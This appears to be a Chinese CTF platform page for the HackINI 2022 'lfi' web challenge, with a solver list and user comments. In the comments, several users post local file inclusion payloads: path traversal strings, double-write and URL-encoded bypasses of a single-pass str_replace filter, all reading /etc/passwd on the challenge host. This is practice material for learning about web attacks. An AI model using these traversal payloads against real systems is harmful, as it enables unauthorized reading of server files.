lfiWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 1432
提  示:
描  述:
We made some serious checks now, would you test it ?
评论
15629299376 3月前

这个题目我都没有双写绕过,直接http://49.232.142.230:13545/?language=/etc/passwd就出来了,作者还有待改进

回复 0

starest 4月前

双写绕过,把所有../换成..././即可

回复 0

MoCaser 4月前

我用的url编码 http://49.232.142.230:16456/?language=/..%2f..%2f..%2f..%2fetc/passwd

回复 0

000ooo 7月前

?language=/etc/passwd 有点意外

回复 1

Zhumeng 7月前

根据页面提示输入language 然后 str_replace只替换一次双写绕过通过路径穿越读取/etc/passwd即可读取flag

回复 0

意大利炮 8月前

/?language=/....//....//....//....//etc/passwd

回复 0

小白帽来挖个漏洞 8月前

解析:https://blog.csdn.net/guanrongl/article/details/142967307

回复 0

阿甘先生 8月前

?language=..//etc/passwd

回复 0

jun1223 10月前

?language=/etc/passwd 这也行

回复 3

userxin 11月前

?language=/../../../../../etc/passwd

回复 0

WriteUp

image
a2cai

2 金币

评分(1)

解题动态

15754287188 攻破了该题 11小时前
ivf321 攻破了该题 1天前
luckylian 攻破了该题 1天前
17335918325 攻破了该题 1天前
YCanhao 攻破了该题 1天前
小白ctf 攻破了该题 1天前
hsy2078844367 攻破了该题 1天前
2495280533 攻破了该题 2天前
2916213162 攻破了该题 2天前
swewjk 攻破了该题 2天前
buuble123 攻破了该题 3天前
人闲桂花落 攻破了该题 3天前
wsmemail 攻破了该题 4天前
18516952839 攻破了该题 5天前
渴死的鱼 攻破了该题 6天前
smallwhites 攻破了该题 8天前
1830955248 攻破了该题 9天前
ahsjezyt 攻破了该题 9天前
1345736679 攻破了该题 11天前
cw19950702 攻破了该题 12天前
问题反馈